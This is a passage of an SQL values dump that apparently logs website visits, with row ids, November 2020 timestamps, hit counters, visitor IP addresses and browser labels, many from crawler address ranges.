(544679,1604423521,1,1,0,0,'66.220.149.5','other'),(544680,1604423562,1,1,0,0,'173.252.95.24','other'),(544681,1604423587,1,1,0,0,'93.74.5.195','chrome'),(544682,1604423671,1,1,0,0,'31.13.127.22','other'),(544683,1604423703,1,1,0,0,'173.252.95.30','other'),(544684,1604423783,1,1,0,0,'31.13.115.3','other'),(544685,1604423839,1,1,0,0,'31.13.115.119','other'),(544686,1604423949,1,1,0,0,'91.196.178.21','chrome'),(544687,1604423976,1,1,0,0,'69.171.251.15','other'),(544688,1604424004,1,1,0,0,'173.252.111.5','other'),(544689,1604424075,1,1,0,0,'66.220.149.8','other'),(544690,1604424081,2,2,0,0,'173.252.127.27','other'),(544691,1604424097,1,1,0,0,'173.252.95.3','other'),(544692,1604424098,1,1,0,0,'66.220.149.118','other'),(544693,1604424118,1,1,0,0,'69.171.251.9','other'),(544694,1604424124,1,1,0,0,'69.171.251.23','other'),(544695,1604424133,1,1,0,0,'173.252.95.12','other'),(544696,1604424147,1,1,0,0,'37.73.76.106','chrome'),(544697,1604424149,1,1,0,0,'173.252.95.26','other'),(544698,1604424183,1,1,0,0,'173.252.95.113','other'),(544699,1604424260,1,1,0,0,'31.13.127.117','other'),(544700,1604424426,1,1,0,0,'69.171.251.29','other'),(544701,1604424477,1,1,0,0,'173.252.95.2','other'),(544702,1604424523,1,1,0,0,'173.252.127.119','other'),(544703,1604424524,1,1,0,0,'173.252.95.31','other'),(544704,1604424536,1,1,0,0,'130.180.218.176','chrome'),(544705,1604424566,1,1,0,0,'31.13.127.23','other'),(544706,1604424581,1,1,0,0,'173.252.111.4','other'),(544707,1604424582,1,1,0,0,'46.133.114.164','chrome'),(544708,1604424622,1,1,0,0,'69.171.251.11','other'),(544709,1604424649,1,1,0,0,'195.10.210.210','other'),(544710,1604424662,1,1,0,0,'69.171.251.5','other'),(544711,1604424704,1,1,0,0,'173.252.95.27','other'),(544712,1604424761,1,1,0,0,'195.10.210.210','chrome'),(544713,1604424768,1,1,0,0,'88.155.2.213','chrome'),(544714,1604424851,1,1,0,0,'66.220.149.17','other'),(544715,1604424880,1,1,0,0,'173.252.95.28','other'),(544716,1604424926,1,1,0,0,'66.220.149.31','other'),(544717,1604424932,1,1,0,0,'69.171.251.112','other'),(544718,1604424963,1,1,0,0,'173.252.95.30','other'),(544719,1604425097,2,2,0,0,'173.252.95.16','other'),(544720,1604425143,1,1,0,0,'31.13.115.12','other'),(544721,1604425203,1,1,0,0,'69.171.251.30','other'),(544722,1604425276,1,1,0,0,'31.13.127.1','other'),(544723,1604425277,1,1,0,0,'31.13.127.6','other'),(544724,1604425285,1,1,0,0,'173.252.95.5','other'),(544725,1604425355,1,1,0,0,'94.153.20.127','other'),(544726,1604425366,1,1,0,0,'46.211.48.10','chrome'),(544727,1604425494,1,1,0,0,'46.211.46.54','chrome'),(544728,1604425511,1,1,0,0,'31.13.127.21','other'),(544729,1604425590,1,1,0,0,'69.171.251.21','other'),(544730,1604425600,1,1,0,0,'91.196.178.23','chrome'),(544731,1604425642,1,1,0,0,'31.13.127.16','other'),(544732,1604425697,3,3,0,0,'173.252.95.29','other'),(544733,1604425703,1,1,0,0,'69.171.251.6','other'),(544734,1604425708,1,1,0,0,'88.155.109.55','other'),(544735,1604425778,1,1,0,0,'91.196.178.171','other'),(544736,1604425823,1,1,0,0,'173.252.95.25','other'),(544737,1604425836,1,1,0,0,'37.73.16.189','chrome'),(544738,1604425856,1,1,0,0,'91.196.178.21','chrome'),(544739,1604425886,1,1,0,0,'173.252.95.32','other'),(544740,1604425897,1,1,0,0,'69.171.251.18','other'),(544741,1604425899,1,1,0,0,'66.220.149.10','other'),(544742,1604426045,1,1,0,0,'66.220.149.4','other'),(544743,1604426080,1,1,0,0,'31.13.127.5','other'),(544744,1604426081,1,1,0,0,'66.220.149.21','other'),(544745,1604426082,1,1,0,0,'91.196.178.58','other'),(544746,1604426091,3,3,0,0,'195.10.210.210','chrome'),(544747,1604426132,1,1,0,0,'31.13.127.18','other'),(544748,1604426152,1,1,0,0,'66.220.149.24','other'),(544749,1604426257,1,1,0,0,'69.171.251.24','other'),(544750,1604426289,1,1,0,0,'31.13.115.1','other'),(544751,1604426395,1,1,0,0,'173.252.95.12','other'),(544752,1604426482,1,1,0,0,'31.13.127.17','other'),(544753,1604426501,1,1,0,0,'173.252.95.17','other'),(544754,1604426559,1,1,0,0,'173.252.95.117','other'),(544755,1604426721,1,1,0,0,'31.13.115.117','other'),(544756,1604426767,1,1,0,0,'91.240.100.224','chrome'),(544757,1604426833,1,1,0,0,'173.252.95.18','other'),(544758,1604426842,1,1,0,0,'91.196.178.37','chrome'),(544759,1604426844,2,2,0,0,'173.252.95.4','other'),(544760,1604426845,1,1,0,0,'69.171.251.18','other'),(544761,1604426889,1,1,0,0,'95.132.1.116','chrome'),(544762,1604426944,2,2,0,0,'173.252.95.11','other'),(544763,1604426979,1,1,0,0,'31.13.127.6','other'),(544764,1604426988,1,1,0,0,'91.196.178.58','other'),(544765,1604427033,1,1,0,0,'173.252.95.7','other'),(544766,1604427043,1,1,0,0,'173.252.127.19','other'),(544767,1604427075,1,1,0,0,'173.252.95.111','other'),(544768,1604427113,1,1,0,0,'66.220.149.13','other'),(544769,1604427196,1,1,0,0,'173.252.127.38','other'),(544770,1604427209,1,1,0,0,'31.13.127.18','other'),(544771,1604427213,2,2,0,0,'195.10.210.210','chrome'),(544772,1604427492,1,1,0,0,'173.252.95.120','other'),(544773,1604427528,1,1,0,0,'69.171.251.23','other'),(544774,1604427545,2,2,0,0,'173.252.95.20','other'),(544775,1604427554,1,1,0,0,'69.171.251.5','other'),(544776,1604427584,1,1,0,0,'69.171.251.29','other'),(544777,1604427598,1,1,0,0,'91.196.178.107','chrome'),(544778,1604427625,1,1,0,0,'66.220.149.15','other'),(544779,1604427650,1,1,0,0,'173.252.111.118','other'),(544780,1604427654,1,1,0,0,'46.211.33.141','chrome'),(544781,1604427687,1,1,0,0,'69.171.251.24','other'),(544782,1604427762,1,1,0,0,'31.13.127.120','other'),(544783,1604427777,1,1,0,0,'91.196.178.103','chrome'),(544784,1604427884,1,1,0,0,'31.13.127.8','other'),(544785,1604427894,1,1,0,0,'173.252.111.117','other'),(544786,1604427941,1,1,0,0,'31.13.127.2','other'),(544787,1604427944,1,1,0,0,'173.252.127.25','other'),(544788,1604427956,1,1,0,0,'173.252.127.19','other'),(544789,1604427979,1,1,0,0,'78.111.185.217','chrome'),(544790,1604428019,1,1,0,0,'46.201.113.150','chrome'),(544791,1604428125,2,2,0,0,'173.252.95.118','other'),(544792,1604428233,1,1,0,0,'31.13.127.19','other'),(544793,1604428287,1,1,0,0,'69.171.251.118','other'),(544794,1604428364,1,1,0,0,'173.252.95.2','other'),(544795,1604428380,1,1,0,0,'128.124.69.191','chrome'),(544796,1604428521,1,1,0,0,'31.13.103.113','other'),(544797,1604428590,1,1,0,0,'66.220.149.32','other'),(544798,1604428603,1,1,0,0,'188.163.32.24','chrome'),(544799,1604428740,1,1,0,0,'173.252.127.13','other'),(544800,1604428747,1,1,0,0,'173.252.95.18','other'),(544801,1604428757,1,1,0,0,'91.196.178.14','chrome'),(544802,1604428760,1,1,0,0,'31.13.127.120','other'),(544803,1604428765,1,1,0,0,'66.220.149.13','other'),(544804,1604428787,1,1,0,0,'91.196.178.21','chrome'),(544805,1604428818,1,1,0,0,'173.252.111.15','other'),(544806,1604428850,2,2,0,0,'69.171.251.17','other'),(544807,1604428872,1,1,0,0,'69.171.251.27','other'),(544808,1604428874,1,1,0,0,'173.252.95.3','other'),(544809,1604428883,1,1,0,0,'195.10.210.70','chrome'),(544810,1604428995,1,1,0,0,'66.249.66.91','chrome'),(544811,1604429034,1,1,0,0,'173.252.95.4','other'),(544812,1604429039,1,1,0,0,'31.13.127.116','other'),(544813,1604429061,1,1,0,0,'173.252.95.116','other'),(544814,1604429082,1,1,0,0,'173.252.127.5','other'),(544815,1604429107,1,1,0,0,'173.252.95.11','other'),(544816,1604429220,1,1,0,0,'195.10.210.210','chrome'),(544817,1604429264,1,1,0,0,'173.252.95.15','other'),(544818,1604429381,1,1,0,0,'173.252.95.1','other'),(544819,1604429406,1,1,0,0,'66.220.149.30','other'),(544820,1604429512,1,1,0,0,'31.13.115.7','other'),(544821,1604429514,2,2,0,0,'173.252.95.118','other'),(544822,1604429516,1,1,0,0,'173.252.95.28','other'),(544823,1604429530,1,1,0,0,'173.252.95.10','other'),(544824,1604429534,1,1,0,0,'91.196.178.177','chrome'),(544825,1604429602,1,1,0,0,'94.153.8.238','chrome'),(544826,1604429776,1,1,0,0,'31.13.127.16','other'),(544827,1604429780,1,1,0,0,'173.252.95.12','other'),(544828,1604429807,1,1,0,0,'173.252.95.8','other'),(544829,1604429846,1,1,0,0,'91.196.178.161','chrome'),(544830,1604429872,1,1,0,0,'66.220.149.9','other'),(544831,1604429883,1,1,0,0,'91.196.178.174','chrome'),(544832,1604429908,1,1,0,0,'69.171.251.29','other'),(544833,1604430035,1,1,0,0,'94.153.51.142','chrome'),(544834,1604430053,1,1,0,0,'173.252.95.113','other'),(544835,1604430098,1,1,0,0,'173.252.95.117','other'),(544836,1604430128,1,1,0,0,'173.252.127.118','other'),(544837,1604430142,1,1,0,0,'173.252.95.4','other'),(544838,1604430308,1,1,0,0,'66.220.149.1','other'),(544839,1604430339,1,1,0,0,'173.252.111.5','other'),(544840,1604430381,1,1,0,0,'69.171.251.11','other'),(544841,1604430409,1,1,0,0,'69.171.251.4','other'),(544842,1604430443,1,1,0,0,'31.13.127.23','other'),(544843,1604430457,1,1,0,0,'173.252.95.116','other'),(544844,1604430464,1,1,0,0,'66.220.149.20','other'),(544845,1604430495,1,1,0,0,'66.220.149.27','other'),(544846,1604430525,1,1,0,0,'31.13.127.6','other'),(544847,1604430578,1,1,0,0,'69.171.251.14','other'),(544848,1604430594,1,1,0,0,'31.13.127.4','other'),(544849,1604430607,1,1,0,0,'66.220.149.26','other'),(544850,1604430647,1,1,0,0,'173.252.127.10','other'),(544851,1604430660,1,1,0,0,'173.252.95.32','other'),(544852,1604430690,1,1,0,0,'46.211.3.63','chrome'),(544853,1604430716,1,1,0,0,'176.36.13.96','other'),(544854,1604430723,1,1,0,0,'31.13.115.1','other'),(544855,1604430742,1,1,0,0,'173.252.95.2','other'),(544856,1604430799,1,1,0,0,'173.252.95.112','other'),(544857,1604430813,1,1,0,0,'66.249.66.92','chrome'),(544858,1604430942,1,1,0,0,'66.220.149.21','other'),(544859,1604430959,1,1,0,0,'31.13.115.8','other'),(544860,1604431050,1,1,0,0,'173.252.127.17','other'),(544861,1604431057,1,1,0,0,'195.10.210.70','chrome'),(544862,1604431078,1,1,0,0,'91.196.178.21','chrome'),(544863,1604431155,1,1,0,0,'31.13.127.18','other'),(544864,1604431202,1,1,0,0,'69.171.251.116','other'),(544865,1604431207,1,1,0,0,'91.196.178.26','other'),(544866,1604431249,1,1,0,0,'31.13.127.8','other'),(544867,1604431264,2,2,0,0,'173.252.95.1','other'),(544868,1604431309,1,1,0,0,'31.13.115.111','other'),(544869,1604431318,1,1,0,0,'95.133.153.68','chrome'),(544870,1604431338,1,1,0,0,'193.201.216.220','chrome'),(544871,1604431347,1,1,0,0,'31.13.127.112','other'),(544873,1604431461,1,1,0,0,'69.171.251.28','other'),(544874,1604431463,1,1,0,0,'173.252.95.5','other'),(544875,1604431709,1,1,0,0,'173.252.111.11','other'),(544876,1604431751,1,1,0,0,'173.252.127.18','other'),(544877,1604431759,1,1,0,0,'91.196.178.117','chrome'),(544878,1604431761,1,1,0,0,'173.252.95.8','other'),(544879,1604431777,1,1,0,0,'66.220.149.5','other'),(544880,1604431796,1,1,0,0,'173.252.95.4','other'),(544881,1604431808,1,1,0,0,'173.252.111.2','other'),(544882,1604431820,1,1,0,0,'173.252.95.19','other'),(544883,1604431840,1,1,0,0,'173.252.95.16','other'),(544884,1604431979,1,1,0,0,'31.13.103.117','other'),(544885,1604432004,1,1,0,0,'173.252.95.15','other'),(544886,1604432010,1,1,0,0,'66.220.149.6','other'),(544887,1604432033,1,1,0,0,'173.252.127.27','other'),(544888,1604432043,1,1,0,0,'178.54.63.27','chrome'),(544889,1604432047,1,1,0,0,'130.180.212.39','chrome'),(544890,1604432055,1,1,0,0,'173.252.95.31','other'),(544891,1604432065,1,1,0,0,'69.171.251.19','other'),(544892,1604432069,1,1,0,0,'46.211.62.116','chrome'),(544893,1604432130,1,1,0,0,'31.13.127.113','other'),(544894,1604432242,1,1,0,0,'31.13.127.4','other'),(544895,1604432301,1,1,0,0,'91.196.178.21','chrome'),(544896,1604432310,2,2,0,0,'195.10.210.70','chrome'),(544897,1604432333,1,1,0,0,'173.252.95.112','other'),(544898,1604432423,1,1,0,0,'31.13.103.14','other'),(544899,1604432453,1,1,0,0,'173.252.95.21','other'),(544900,1604432517,1,1,0,0,'69.171.251.20','other'),(544901,1604432580,2,2,0,0,'66.220.149.7','other'),(544902,1604432603,1,1,0,0,'66.220.149.1','other'),(544903,1604432655,2,2,0,0,'173.252.95.11','other'),(544904,1604432760,1,1,0,0,'173.252.111.6','other'),(544905,1604432762,1,1,0,0,'86.49.247.221','chrome'),(544906,1604432772,1,1,0,0,'173.252.95.29','other'),(544907,1604432775,1,1,0,0,'69.171.251.21','other'),(544908,1604432970,1,1,0,0,'173.252.95.13','other'),(544910,1604432995,1,1,0,0,'31.13.127.15','other'),(544911,1604432996,2,2,0,0,'69.171.251.4','other'),(544912,1604433095,2,2,0,0,'173.252.95.25','other'),(544913,1604433107,1,1,0,0,'173.252.95.14','other'),(544914,1604433199,1,1,0,0,'173.252.127.113','other'),(544915,1604433367,1,1,0,0,'173.252.95.26','other'),(544916,1604433393,1,1,0,0,'173.252.95.18','other'),(544917,1604433414,1,1,0,0,'195.10.210.70','chrome'),(544918,1604433570,1,1,0,0,'130.180.212.173','chrome'),(544919,1604433627,1,1,0,0,'69.171.251.8','other'),(544920,1604433638,1,1,0,0,'66.220.149.24','other'),(544921,1604433663,1,1,0,0,'31.13.127.14','other'),(544922,1604433759,1,1,0,0,'173.252.95.32','other'),(544923,1604433767,1,1,0,0,'31.13.127.10','other'),(544924,1604433776,1,1,0,0,'31.13.127.20','other'),(544925,1604433791,1,1,0,0,'94.158.95.4','chrome'),(544926,1604433826,1,1,0,0,'173.252.95.21','other'),(544927,1604433916,1,1,0,0,'66.220.149.10','other'),(544928,1604433922,1,1,0,0,'69.171.251.30','other'),(544929,1604433937,1,1,0,0,'173.252.95.6','other'),(544930,1604434074,1,1,0,0,'173.252.95.4','other'),(544931,1604434196,1,1,0,0,'173.252.95.3','other'),(544932,1604434265,1,1,0,0,'173.252.95.19','other'),(544933,1604434327,1,1,0,0,'31.13.127.6','other'),(544934,1604434338,1,1,0,0,'173.252.95.116','other'),(544935,1604434343,1,1,0,0,'31.13.127.8','other'),(544936,1604434353,1,1,0,0,'94.153.78.139','chrome'),(544937,1604434368,1,1,0,0,'46.211.76.206','chrome'),(544938,1604434406,1,1,0,0,'69.171.251.7','other'),(544939,1604434413,1,1,0,0,'66.220.149.33','other'),(544940,1604434433,1,1,0,0,'66.220.149.23','other'),(544941,1604434663,2,2,0,0,'195.10.210.210','chrome'),(544942,1604434705,1,1,0,0,'173.252.111.2','other'),(544943,1604434833,2,2,0,0,'31.13.127.111','other'),(544944,1604434952,1,1,0,0,'195.10.210.70','chrome'),(544945,1604434958,1,1,0,0,'173.252.95.118','other'),(544946,1604434963,1,1,0,0,'31.13.127.113','other'),(544947,1604434978,1,1,0,0,'91.196.178.20','chrome'),(544948,1604435067,1,1,0,0,'66.220.149.29','other'),(544949,1604435073,1,1,0,0,'173.252.95.6','other'),(544950,1604435129,3,3,0,0,'173.252.95.8','other'),(544951,1604435209,1,1,0,0,'149.154.161.14','other'),(544952,1604435294,1,1,0,0,'173.252.95.3','other'),(544953,1604435304,1,1,0,0,'69.171.251.25','other'),(544954,1604435307,2,2,0,0,'173.252.95.29','other'),(544955,1604435325,2,2,0,0,'69.171.251.5','other'),(544956,1604435463,1,1,0,0,'31.13.127.22','other'),(544957,1604435503,1,1,0,0,'178.133.225.244','chrome'),(544958,1604435530,1,1,0,0,'31.13.127.119','other'),(544959,1604435645,1,1,0,0,'173.252.95.16','other'),(544960,1604435890,1,1,0,0,'94.153.1.62','chrome'),(544961,1604435910,1,1,0,0,'66.220.149.31','other'),(544962,1604435945,1,1,0,0,'178.95.67.114','chrome'),(544963,1604436046,1,1,0,0,'173.252.95.32','other'),(544964,1604436212,3,3,0,0,'31.13.127.17','other'),(544965,1604436219,1,1,0,0,'173.252.95.26','other'),(544966,1604436377,1,1,0,0,'69.171.251.13','other'),(544967,1604436459,1,1,0,0,'173.252.95.29','other'),(544968,1604436647,1,1,0,0,'31.13.115.8','other'),(544969,1604436681,2,2,0,0,'66.220.149.118','other'),(544970,1604436700,1,1,0,0,'173.252.95.3','other'),(544971,1604436718,1,1,0,0,'31.13.115.11','other'),(544972,1604436878,1,1,0,0,'31.13.127.3','other'),(544973,1604436881,1,1,0,0,'176.36.148.180','other'),(544974,1604436988,1,1,0,0,'69.171.251.15','other'),(544975,1604437084,1,1,0,0,'173.252.95.22','other'),(544976,1604437405,1,1,0,0,'78.111.185.18','chrome'),(544977,1604437446,1,1,0,0,'69.171.251.22','other'),(544978,1604437518,1,1,0,0,'173.252.111.10','other'),(544979,1604437632,1,1,0,0,'31.13.127.18','other'),(544981,1604437990,1,1,0,0,'173.252.95.16','other'),(544982,1604438129,1,1,0,0,'91.196.178.48','chrome'),(544983,1604438228,1,1,0,0,'31.13.127.5','other'),(544984,1604438287,1,1,0,0,'69.171.251.20','other'),(544985,1604438289,1,1,0,0,'173.252.111.20','other'),(544986,1604438303,1,1,0,0,'31.13.127.10','other'),(544987,1604438332,1,1,0,0,'173.252.95.5','other'),(544988,1604438427,1,1,0,0,'173.252.83.120','other'),(544989,1604438469,1,1,0,0,'66.220.149.26','other'),(544990,1604438548,1,1,0,0,'66.220.149.27','other'),(544991,1604438557,1,1,0,0,'173.252.95.14','other'),(544992,1604438796,1,1,0,0,'94.153.32.88','chrome'),(544993,1604438810,1,1,0,0,'173.252.127.28','other'),(544994,1604439050,1,1,0,0,'69.171.251.13','other'),(544995,1604439129,1,1,0,0,'31.13.127.112','other'),(544996,1604439199,1,1,0,0,'130.180.212.173','chrome'),(544997,1604439329,1,1,0,0,'31.13.115.7','other'),(544998,1604439360,1,1,0,0,'66.220.149.3','other'),(544999,1604439612,1,1,0,0,'173.252.95.10','other'),(545000,1604439638,1,1,0,0,'173.252.95.5','other'),(545001,1604439819,1,1,0,0,'69.171.251.17','other'),(545002,1604439898,1,1,0,0,'31.13.127.113','other'),(545003,1604439925,1,1,0,0,'173.252.95.12','other'),(545004,1604440574,1,1,0,0,'173.252.127.6','other'),(545005,1604440646,1,1,0,0,'173.252.95.112','other'),(545006,1604440664,1,1,0,0,'69.171.251.116','other'),(545007,1604440721,1,1,0,0,'173.252.127.2','other'),(545008,1604440757,1,1,0,0,'31.13.127.118','other'),(545009,1604440824,1,1,0,0,'69.171.251.14','other'),(545010,1604440882,1,1,0,0,'173.252.95.9','other'),(545011,1604440979,1,1,0,0,'173.252.127.25','other'),(545012,1604441112,1,1,0,0,'66.220.149.112','other'),(545013,1604441400,1,1,0,0,'66.220.149.2','other'),(545014,1604441481,1,1,0,0,'31.13.127.113','other'),(545015,1604441682,1,1,0,0,'69.171.251.26','other'),(545016,1604441915,1,1,0,0,'46.211.13.233','chrome'),(545017,1604441977,1,1,0,0,'173.252.111.119','other'),(545018,1604442002,1,1,0,0,'66.220.149.16','other'),(545019,1604442016,1,1,0,0,'66.249.66.91','chrome'),(545020,1604442062,1,1,0,0,'173.252.95.28','other'),(545021,1604442309,1,1,0,0,'31.13.127.22','other'),(545022,1604442437,1,1,0,0,'31.13.115.116','other'),(545023,1604442470,1,1,0,0,'31.13.127.17','other'),(545024,1604442518,1,1,0,0,'66.220.149.112','other'),(545025,1604443094,1,1,0,0,'66.220.149.11','other'),(545026,1604443135,1,1,0,0,'69.171.251.5','other'),(545027,1604443341,1,1,0,0,'66.220.149.113','other'),(545028,1604443465,1,1,0,0,'173.252.127.2','other'),(545029,1604443907,1,1,0,0,'31.13.127.1','other'),(545030,1604444271,1,1,0,0,'173.252.127.119','other'),(545032,1604444333,2,2,0,0,'66.249.66.93','chrome'),(545033,1604444580,1,1,0,0,'46.211.80.60','chrome'),(545034,1604444831,1,1,0,0,'66.220.149.8','other'),(545035,1604444974,1,1,0,0,'69.171.251.118','other'),(545036,1604444980,1,1,0,0,'31.13.127.3','other'),(545037,1604445000,1,1,0,0,'66.220.149.15','other'),(545038,1604445190,1,1,0,0,'31.13.127.15','other'),(545039,1604445732,1,1,0,0,'66.249.66.92','chrome'),(545040,1604445792,1,1,0,0,'66.249.66.93','chrome'),(545041,1604446037,1,1,0,0,'31.13.127.19','other'),(545042,1604446041,1,1,0,0,'173.252.95.9','other'),(545043,1604446697,1,1,0,0,'31.13.127.9','other'),(545044,1604447412,1,1,0,0,'31.13.127.10','other'),(545045,1604447434,1,1,0,0,'31.13.115.23','other'),(545046,1604448303,1,1,0,0,'173.252.95.118','other'),(545047,1604448803,1,1,0,0,'31.13.127.5','other'),(545048,1604449810,1,1,0,0,'31.13.127.119','other'),(545049,1604449811,1,1,0,0,'173.252.95.1','other'),(545050,1604449851,1,1,0,0,'66.249.66.93','chrome'),(545051,1604449988,1,1,0,0,'69.171.251.116','other'),(545052,1604450784,1,1,0,0,'173.252.95.20','other'),(545053,1604450876,1,1,0,0,'173.252.95.112','other'),(545054,1604453232,1,1,0,0,'31.13.103.11','other'),(545055,1604453629,1,1,0,0,'69.171.251.7','other'),(545056,1604454839,1,1,0,0,'66.220.149.112','other'),(545057,1604455374,1,0,1,0,'66.249.66.77',''),(545058,1604459826,1,1,0,0,'31.13.115.120','other'),(545059,1604459851,1,1,0,0,'31.13.103.24','other'),(545060,1604460210,1,1,0,0,'31.13.103.119','other'),(545061,1604460272,1,1,0,0,'173.252.95.6','other'),(545062,1604460710,1,1,0,0,'69.171.251.18','other'),(545063,1604460728,1,1,0,0,'173.252.95.18','other'),(545064,1604461405,1,1,0,0,'173.252.95.13','other'),(545065,1604461659,1,1,0,0,'31.13.103.112','other'),(545067,1604462350,1,1,0,0,'91.196.178.30','chrome'),(545068,1604462758,1,1,0,0,'31.13.103.20','other'),(545069,1604462776,1,1,0,0,'185.143.147.196','chrome'),(545070,1604462784,1,1,0,0,'173.252.95.11','other'),(545071,1604462786,1,1,0,0,'69.171.251.119','other'),(545072,1604463198,1,1,0,0,'66.220.149.12','other'),(545073,1604463431,1,1,0,0,'31.13.103.4','other'),(545074,1604464498,2,2,0,0,'31.13.127.22','other'),(545075,1604464582,1,1,0,0,'31.13.103.13','other'),(545076,1604464766,1,1,0,0,'173.252.95.111','other'),(545077,1604464859,1,1,0,0,'173.252.95.21','other'),(545078,1604464912,1,1,0,0,'91.196.178.30','chrome'),(545079,1604464947,1,1,0,0,'66.220.149.7','other'),(545081,1604465087,1,1,0,0,'173.252.95.8','other'),(545082,1604465374,1,1,0,0,'173.252.95.118','other'),(545083,1604465655,1,1,0,0,'173.252.95.3','other'),(545084,1604465974,1,1,0,0,'185.237.217.2','other'),(545085,1604466177,2,2,0,0,'173.252.95.4','other'),(545086,1604466199,1,1,0,0,'31.13.127.3','other'),(545087,1604466329,1,1,0,0,'31.13.115.2','other'),(545088,1604466597,1,1,0,0,'173.252.95.17','other'),(545089,1604466837,1,1,0,0,'31.13.127.120','other'),(545090,1604467002,1,1,0,0,'66.220.149.120','other'),(545091,1604467081,1,1,0,0,'173.252.111.15','other'),(545096,1604467153,1,1,0,0,'173.252.95.20','other'),(545097,1604467240,1,1,0,0,'69.171.251.9','other'),(545098,1604467249,1,1,0,0,'173.252.127.117','other'),(545099,1604467303,1,1,0,0,'173.252.95.8','other'),(545100,1604467393,1,1,0,0,'173.252.95.1','other'),(545101,1604467447,1,1,0,0,'31.13.127.21','other'),(545102,1604467636,1,1,0,0,'173.252.95.2','other'),(545103,1604467668,1,1,0,0,'173.252.127.11','other'),(545104,1604467714,1,1,0,0,'173.252.127.16','other'),(545105,1604467936,1,1,0,0,'69.171.251.5','other'),(545106,1604468003,1,1,0,0,'173.252.95.21','other'),(545107,1604468068,1,1,0,0,'173.252.95.5','other'),(545108,1604468171,1,1,0,0,'173.252.111.19','other'),(545109,1604468208,1,1,0,0,'66.220.149.15','other'),(545110,1604468514,1,1,0,0,'31.13.127.14','other'),(545112,1604468606,1,1,0,0,'69.171.251.21','other'),(545113,1604468648,1,1,0,0,'31.13.103.1','other'),(545114,1604468967,1,1,0,0,'173.252.95.111','other'),(545115,1604469214,1,1,0,0,'173.252.95.118','other'),(545116,1604469223,1,1,0,0,'91.196.178.86','chrome'),(545117,1604469377,1,1,0,0,'31.13.127.4','other'),(545118,1604469385,1,1,0,0,'31.13.127.113','other'),(545119,1604469459,1,1,0,0,'69.171.251.26','other'),(545120,1604469805,1,1,0,0,'66.220.149.22','other'),(545121,1604469815,1,1,0,0,'173.252.95.3','other'),(545122,1604469816,1,1,0,0,'69.171.251.1','other'),(545123,1604470083,1,1,0,0,'31.13.127.14','other'),(545124,1604470086,1,1,0,0,'173.252.95.9','other'),(545125,1604470268,1,1,0,0,'173.252.95.119','other'),(545126,1604470313,1,1,0,0,'31.13.103.120','other'),(545127,1604470467,1,1,0,0,'173.252.95.4','other'),(545128,1604470523,1,1,0,0,'46.211.55.220','chrome'),(545129,1604470574,1,1,0,0,'173.252.95.7','other'),(545130,1604470600,1,1,0,0,'173.252.95.23','other'),(545131,1604470602,1,1,0,0,'69.171.251.12','other'),(545132,1604470781,1,1,0,0,'173.252.127.26','other'),(545133,1604470801,1,1,0,0,'66.220.149.27','other'),(545134,1604470885,1,1,0,0,'173.252.95.18','other'),(545135,1604470944,1,1,0,0,'31.13.115.19','other'),(545136,1604471076,1,1,0,0,'46.211.74.96','chrome'),(545137,1604471311,2,2,0,0,'173.252.95.120','other'),(545138,1604471603,1,1,0,0,'31.13.127.8','other'),(545140,1604471638,1,1,0,0,'66.220.149.9','other'),(545142,1604471639,1,1,0,0,'173.252.95.3','other'),(545143,1604471692,1,1,0,0,'31.13.127.113','other'),(545144,1604471871,1,1,0,0,'173.252.95.24','other'),(545145,1604472193,1,1,0,0,'173.252.95.111','other'),(545146,1604472202,1,1,0,0,'69.171.251.11','other'),(545147,1604472332,1,1,0,0,'66.220.149.27','other'),(545149,1604472406,1,1,0,0,'31.13.127.117','other'),(545150,1604472457,1,1,0,0,'173.252.95.119','other'),(545151,1604472637,1,1,0,0,'31.13.115.19','other'),(545152,1604472670,1,1,0,0,'31.13.103.120','other'),(545153,1604472799,1,1,0,0,'173.252.95.12','other'),(545154,1604472821,1,1,0,0,'69.171.251.7','other'),(545155,1604473015,1,1,0,0,'66.220.149.15','other'),(545156,1604473040,1,1,0,0,'69.171.251.22','other'),(545157,1604473105,1,1,0,0,'173.252.95.17','other'),(545158,1604473137,1,1,0,0,'31.13.127.21','other'),(545159,1604473153,1,1,0,0,'31.13.127.3','other'),(545161,1604473344,1,1,0,0,'173.252.95.16','other'),(545162,1604473351,1,1,0,0,'91.196.179.134','other'),(545163,1604473695,1,1,0,0,'31.13.115.111','other'),(545164,1604473738,1,1,0,0,'69.171.251.9','other'),(545165,1604473897,1,1,0,0,'173.252.95.5','other'),(545166,1604473980,1,1,0,0,'31.13.127.5','other'),(545167,1604474246,1,1,0,0,'91.196.178.30','chrome'),(545168,1604474315,1,1,0,0,'31.13.127.24','other'),(545169,1604474332,1,1,0,0,'173.252.95.112','other'),(545170,1604474600,1,1,0,0,'173.252.95.13','other'),(545171,1604474621,1,1,0,0,'31.13.115.6','other'),(545173,1604475069,1,1,0,0,'31.13.127.4','other'),(545174,1604475265,1,1,0,0,'69.171.251.117','other'),(545175,1604475346,1,1,0,0,'173.252.95.10','other'),(545176,1604475413,1,1,0,0,'173.252.95.112','other'),(545177,1604475495,1,1,0,0,'173.252.95.19','other'),(545178,1604475709,1,1,0,0,'31.13.127.12','other'),(545179,1604475944,1,1,0,0,'173.252.95.1','other'),(545180,1604476000,1,1,0,0,'173.252.95.15','other'),(545181,1604476177,1,1,0,0,'66.220.149.8','other'),(545182,1604476474,1,1,0,0,'66.220.149.7','other'),(545183,1604476504,1,1,0,0,'31.13.127.11','other'),(545184,1604476610,1,1,0,0,'66.220.149.27','other'),(545185,1604476621,1,1,0,0,'69.171.251.5','other'),(545186,1604476701,1,1,0,0,'173.252.95.112','other'),(545187,1604477038,1,1,0,0,'173.252.111.17','other'),(545188,1604477156,1,1,0,0,'31.13.127.116','other'),(545189,1604477720,1,1,0,0,'173.252.95.18','other'),(545190,1604477738,1,1,0,0,'173.252.107.35','other'),(545191,1604477763,1,1,0,0,'69.171.251.1','other'),(545193,1604478052,1,1,0,0,'91.196.179.134','other'),(545194,1604478343,1,1,0,0,'46.133.255.2','chrome'),(545195,1604478559,1,1,0,0,'66.220.149.23','other'),(545196,1604478759,1,1,0,0,'31.13.127.6','other'),(545197,1604478773,1,1,0,0,'31.13.115.14','other'),(545198,1604478778,1,1,0,0,'173.252.95.12','other'),(545199,1604478841,1,1,0,0,'173.252.95.20','other'),(545200,1604478913,1,1,0,0,'69.171.251.117','other'),(545201,1604479393,1,1,0,0,'66.220.149.2','other'),(545202,1604479589,1,1,0,0,'31.13.127.9','other'),(545203,1604479799,1,1,0,0,'173.252.95.3','other'),(545204,1604480094,1,1,0,0,'173.252.95.23','other'),(545205,1604480165,1,1,0,0,'31.13.127.5','other'),(545206,1604480173,1,1,0,0,'66.220.149.31','other'),(545207,1604480204,1,1,0,0,'66.220.149.5','other')